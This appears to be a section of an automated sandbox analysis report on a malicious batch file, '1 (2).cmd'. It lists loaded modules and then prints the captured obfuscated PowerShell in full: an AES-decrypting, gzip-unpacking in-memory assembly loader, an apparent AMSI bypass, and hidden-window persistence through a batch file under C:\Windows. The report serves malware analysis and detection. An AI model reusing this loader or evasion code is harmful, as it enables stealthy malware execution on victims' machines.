Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1 (2).cmd

Static file information: File size 5285337 > 1048576

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($WzFkwARTzpFLOf,$PEmsRMlCSlPDgPcGUWk).Invoke('a'+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$BtHEHTUmMhFSXEmPh=$YLRtgUHBybAeSz.Invoke($Null,@([O
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](114)+''+[Char](98)+'x-s'+'t'+

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''

Suspicious command line found

Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
